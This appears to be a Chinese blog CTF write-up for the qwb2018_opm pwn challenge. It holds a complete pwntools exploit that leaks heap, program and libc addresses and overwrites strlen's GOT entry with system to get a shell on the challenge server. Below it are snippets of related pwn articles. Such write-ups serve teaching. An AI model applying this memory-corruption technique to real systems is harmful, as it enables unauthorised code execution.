[BUUCTF-pwn] qwb2018_opm

最新推荐文章于 2024-11-09 07:44:51 发布
最新推荐文章于 2024-11-09 07:44:51 发布
阅读量2k 收藏
点赞数
分类专栏: CTF pwn 文章标签: 安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/122540379
版权

我讨厌爆破

只有add没有free,但是add中用了gets,很明显是字符串溢出。但是这个溢出不大好利用,因为后边带个固定的\0结尾。

这样就需要堆块建在一个特殊位置0xXXXXX00XX这时候可以通过溢出控制最后一字节而不影响前边数据。由于堆块都是以000结尾,所以需要爆破半个字节。

思路:

  1. 先建几个块使一个块建在00XX的位置(建两个0x70后第3个块正好建在0030+0060,正常是建到?0XX的位置,前边那个0是爆破得到的)
  2. 再建块时先溢出到v6,将其指向前一个块的数据块(0060)这时会将堆指针写到这里,然后第2次溢出将v6覆盖为前一个块的管理块(0030),当调用sub_B30(v6)时将打印出堆地址。在这里用个标记,当标记不正确时raise个例外。
  3. 有堆地址以后,建次建块时先写入一个指向管理块的指针(管理块开始是sub_B30函数指针)再将这个块当作管理块打印出程序加载地址。
  4. 同3的方法,将got地址写入后,当数据块当作管理块,打印出got表里的值得到libc加载地址。
  5. 由于数据块都是由堆建,没有修改功能,利用第2次写时的atoi 将system后4字节作为数字写入,并溢出覆盖到v6将这里写为strlen -24 然后atoi会将数字值写入got.strlen,将其改为system。
  6. 再次写入/bin/sh时调用strlen得到shell
from pwn import *

elf = ELF('./pwn')
context.arch = 'amd64'

def connect():
    global p,libc_elf,one,libc_start_main_ret,local
    
    local = 0
    if local == 1:
        p = process('./pwn')
        libc_elf = ELF('/home/shi/pwn/libc6_2.27-3u1/lib64/libc-2.27.so')
        one = [0x4240e, 0x42462, 0xc4f7f, 0xe31fa, 0xe31ee]
        libc_start_main_ret = 0x21a87
    else:
        p = remote('node4.buuoj.cn', 29475) 
        libc_elf = ELF('../libc6_2.27-3ubuntu1_amd64.so')
        one = [0x4f2c5,0x4f322,0xe569f,0xe5858,0xe585f,0xe5863,0x10a398,0x10a38c]
        libc_start_main_ret = 0x21b97

menu = b"(E)xit\n"
def add(name, n):
    p.sendlineafter(menu, b'A')
    p.sendlineafter(b"Your name:\n", name)
    p.sendlineafter(b"N punch?\n", n)

def show():
    p.sendlineafter(menu, b'S')

def pwn():
    context.log_level = 'debug'
    #s:128 ptr:8
    add(b'A'*0x70, b'888') #0
    add(b'A'*0x70, b'888') #1
    add(b'A'*0x20, b'888') #2
    add(b'B'*0x70, b'888') #3 0x...0030, 0060
    #0x...?000
    add(b'A'*0x80+ b'\x60', b'1'.ljust(0x80, b'\x00') + b'\x30') #4
    p.recvuntil(b'<')
    if p.recv(8) != b'B'*8:
        raise Exception('retry')
    
    heap_addr1 = u64(p.recv(6).ljust(8, b'\x00'))
    print(hex(heap_addr1))
    heap_addr2 = heap_addr1 - 0x2b0 #chunk0.pre_size
    func_addr  = heap_addr2 + 0x10  #chunk0.func_b30
    ptr5_addr  = heap_addr1 + 0xc0  #chunk5.data
    print(hex(heap_addr1), hex(func_addr), hex(ptr5_addr))

    add(b'A'*8 + p64(func_addr), b'888'.ljust(0x80, b'\x00')+ p64(ptr5_addr)) #5
    p.recvuntil(b'<')
    pwn_base = u64(p.recv(6).ljust(8, b'\x00')) - 0xb30
    elf.address = pwn_base
    print('pwn:', hex(pwn_base))

    ptr6_addr   = ptr5_addr + 0x50
    add(b'A'*8 + p64(elf.got['atoi']), b'888'.ljust(0x80, b'\x00')+ p64(ptr6_addr)) #6
    p.recvuntil(b'<')
    libc_base = u64(p.recv(6).ljust(8, b'\x00')) - libc_elf.sym['atoi']
    libc_elf.address = libc_base
    print('libc:', hex(libc_base))
    
    #*(_DWORD *)(v3 + 24) = atoi(s);
    add(b'A', str(libc_elf.sym['system'] & 0xffffffff).encode().ljust(0x80, b'\x00') + p64(elf.got['strlen'] - 24))
    
    #gdb.attach(p)
    #pause()
    
    p.sendlineafter(menu, b'A')
    p.sendlineafter(b"Your name:\n", b'/bin/sh')
    
    p.sendline(b'cat /flag')
    p.interactive()

while True:
    try:
        connect()
        pwn()
    except KeyboardInterrupt as e:
        break
    except:
        p.close()
        print('...')

BUUCTF qwb2018_opm
weixin_45966329的博客
03-07 355
参考了这位师傅的writeup 基础知识: (1)首先要知道用gets()读取数据时,是读不到换行符,读取的换行符会被转换为null值。 (2)程序系统函数的地址的高位字节是一样的,只有低位不同 查看保护: 查看保护 发现可以修改got表 漏洞 add函数中的gets函数存在栈溢出。add函数中有两个gets函数,都可以用来修改存储在栈上的结构体指针。 细节如下: (1)(此时还不能修改存储在栈上的指向结构体的堆指针)add函数先为结构体申请堆地址,然后在结构体里写入了输出函数的地址 (2)调用gets函数
qwb2018_core kernel_rop
令则
02-14 546
qwb 2018 core 文章目录qwb 2018 core环境搭建基础修改init脚本调试漏洞整数截断-栈溢出数据泄漏利用 年轻人的第一个内核题目。 环境搭建 基础 解包: # /bin/sh mv core.cpio core/core.cpio.gz cd core gunzip core.cpio.gz cpio -idm < core.cpio rm core.cpio 重打包: # /bin/sh find . -print0 \ | cpio --null -ov --format
linux kernel pwn -- 2018qwb_core
abelxu
03-22 277
0x01 查看题目 1.查看start.sh启动脚本,开启了kaslr,但是没有开smep和smap,这里有个小坑-m 64M会报错内存不够,可以改成-m 1024M qemu-system-x86_64 \ -m 64M \ -kernel ./bzImage \ -initrd ./core.cpio \ -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr" \ -s \ -netdev user,id=t0,
强网杯 2018 opm
Bill
05-23 1181
强网杯 2018 opm 前言 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;这篇WP是强网杯过去了很久之后才出的, 参考的是极目楚天舒师傅的博客, 这位师傅是一位CTF老赛手, 最近复出.由于图片中不能CTRL+F出文字, 本文章尽量避免使用图片, 除非必要. 程序运行 1. menu You were invited to beat one punch man! (...
【栈溢出】QWB2018-core
qq_61670993的博客
09-23 201
QWB2018-core,简单栈溢出
Kernel rop attack 2018QWBcore复现
qq_39948058的博客
08-28 353
前言:最近刚入手内核题,所以这里跟着ctfwiki进行学习下,大佬勿喷。。。 第一步很经典。。。如果题目没有给 vmlinux,可以通过 extract-vmlinux 提取。 看到start.sh发现开启了kalsr随机化,需要进行泄露计算基地址,这里跟用户态pwn题很相似 看下init: #!/bin/sh mount -t proc proc /proc mount -t sysfs sysfs /sys mount -t devtmpfs none /dev /sbin/mdev -s m
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
[BUUCTF]PWN-wdb_2018_3rd_soEasy
红凳子的博客
05-07 466
[BUUCTF]PWN-wdb_2018_3rd_soEasy前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd impo
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1022
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
linux_kernal_pwn 2018 强网杯 - core
yongbaoii的博客
09-01 337
四个文件,vmlinux不用提取了。 开了kaslr。 我们说内核的保护分四种,隔离、访问控制、异常检测、随机化。 随机化有两种,一个是kaslr,一个是fgkaslr。 在开启了 KASLR 的内核中,内核的代码段基地址等地址会整体偏移。 然后解压文件系统,看看init文件相关配置。 mkdir core cp core.cpio ./core cd core mv ./core.cpio core.cpio.gz #因为cpio是经过gzip压缩过的,必须更改名字,gunzip才认识 gu.
强网杯2018_core
z1r0的博客
03-21 877
强网杯2018_core 具体可以看z1r0’s blog 题目拿到手就是一个tar包。解压 ➜ 2018强网杯-core tar -xvf core_give.tar give_to_player/ give_to_player/bzImage give_to_player/core.cpio give_to_player/start.sh give_to_player/vmlinux ➜ 2018强网杯-core ls core_give.tar give_to_player ➜ 2018强网
ctf web3 writeup
西部壮仔的博客
06-07 720
ctf web3 看到这里这个页面一直在弹出来,我们勾选对号,让这个弹窗停下来 发现什么也没有我们查看源代码看看 有一行被注释的代码,我们把这行代码运行看看 建一个空白txt文档把这行代码写进去,再把文档改成html格式 双击运行 flag就出来了 ...
[XYCTF新生赛2024] pwn
weixin_52640415的博客
06-29 1005
用了一周来复现crypto部分(不能算是复现,拿着 糖醋小鸡块的WP一点点学了下)。两天时间复现PWN部分。相对来说PWN比密码这块要简单,不过ARM,MIPS懒得学了,跳过。
【kernel pwn】(贰)kernel ROP
weixin_43960998的博客
03-19 433
继续学习 kernel pwn 相关知识,同时记录一些方法。 本文以 QWB2018-core 为例 1.题前准备 解压等一套流程。先看一下 start.sh (修改后): qemu-system-x86_64 \ -m 128M \ -kernel ./bzImage \ -initrd ./core.cpio \ -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr" \ -netdev user,id=t0, -
2018强网杯之opm
极目楚天舒的博客
04-26 1771
0x01程序分析程序开启了PIE,说明got表和plt表位置需要通过泄露得到。题目一共可以存放下标为0-9一共10个role,游全局变量0x202130存放。Add函数添加role的管理结构,并将该结构指针存放于全局变量0x2020e0中。输入“S”则调用print的函数指针显示role管理结构所指向的内容。Add函数,为每一个添加的role分配一个结构用于管理,并将该结构地址返回存放于全局变量0...
linux_pwn(2)--double free&&qwb2018_raisepig
azraelxuemo的博客
03-05 1431
文章目录What is double freepwn题例题add函数show函数delete函数开始做题准备框架调试泄露libcdouble freeexp总结 What is double free double free顾名思义,两次释放,在ctf里面一般就是对同一个内存块释放了两次,其实这个跟之前的uaf产生的方式有点类似,都是需要满足指针没有被置NULL ptr=malloc(0x10) ptr2=malloc(0x10) free(ptr) free(ptr2) free(ptr) 由于直接连续
关于Flutter空安全升级方案整理
清风洒脱
11-08 932
Flutter 从 2.0 版本开始支持空安全(Null Safety)。升级到空安全后,由于语法的变动,基本上整个工程,代码都爆红,这对项目来说简直是灾难性的打击,不升级的话只是缓兵之计,因为随着时间的推移,flutter将不再维护非空安全的版本,同时一些三方库也将无法使用,因此空安全升级变成了一个不得不做的事情,项目越复杂需要的时间也就越持久,考虑到对项目的稳定性,和开发周期。选择一个合适自己项目的迁移方案非常重要。下面自己会讲下自己对空安全迁移的理解和实施方案,目前成功迁移几个项目,还是比较有经验的。
【浪潮商城-注册安全分析报告-无验证方式导致安全隐患】
最新发布
weixin_46641057的博客
11-09 1439
浪潮集团是中国领先的云计算、大数据服务商,拥有浪潮信息、浪潮软件、浪潮数字企业三家上市公司。主要业务涉及计算装备、软件、云计算服务、新一代通信、大数据及若干应用场景。已为全球一百二十多个国家和地区提供IT产品和服务。作为国内做电脑硬件起家发展为综合型大型科技企业,拥有雄厚的技术实力,但好像对短信被盗刷的安全方面不够重视 ,测试结果就是随便你怎么攻击都可以,这也有点太开放了, 短信验证码难道不要钱吗?这对黑客来说肯定是好消息, 弄个简单的脚本就可以搞定。
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值